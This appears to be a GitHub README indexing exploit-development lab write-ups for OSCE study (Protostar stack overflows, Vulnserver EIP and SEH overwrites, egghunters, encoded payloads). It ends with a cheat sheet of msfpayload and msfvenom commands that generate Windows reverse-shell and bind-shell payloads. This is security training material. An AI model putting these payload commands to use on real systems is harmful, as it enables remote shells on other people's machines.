Skip to content

Latest commit

 

History

History
124 lines (102 loc) · 7.34 KB

README.md

File metadata and controls

124 lines (102 loc) · 7.34 KB

Exploit Writeups

Exploit Exercise (Protostar)

Module Link Note
Stack0 Stack BOF Intro N/A
Stack1 Stack BOF Basic1 N/A
Stack2 Stack BOF Basic2 N/A
Stack3 Stack BOF Basic3 N/A
Stack4 Stack BOF Basic4 N/A
Stack5 Stack BOF Shellcode
Stack6 Stack BOF ret2libc ROP is no need for OSCE
Stack7 Stack BOF ret2.text ROP is no need for OSCE. But learn POP; POP; RET concept with this

Vulnserver (Vulnserver)

Series Link Command Vulnerability Note
Part 1 Read N/A N/A Lab Setup
Part 2 Read TRUN EIP Overwrite
Part 3 Read GMON SEH Overwrite + Short JMP + Egghunter
Part 4 Read KSTET EIP Overwrite + Short JMP + Egghunter
Part 5 Read HTER EIP Overwrite + Restricted Characters + Manual Offset Finding
Part 6 Read GTER EIP Overwrite + Socket Reuse Exploit
Part 7 Read LTER SEH Overwrite + Restricted Characters + Encoded Payloads

Links

Reviews

Github

Resources


Reverse Shell

Windows XP/Vista Ultimate

/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C

Later Windows

/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C 

msfvenom -p windows/shell_reverse_tcp LHOST=1192.168.x.x LPORT=443 -a x86 --platform=win -e x86/alpha_mixed -f raw

Bind Shell

Windows XP/Vista Ultimate

msfpayload windows/shell_bind_tcp R > bind
msfencode -e x86/alpha_mixed -i bind -t perl

Later Windows

msfvenom -p windows/shell_bind_tcp -a x86 --platform=win -e x86/alpha_mixed -f perl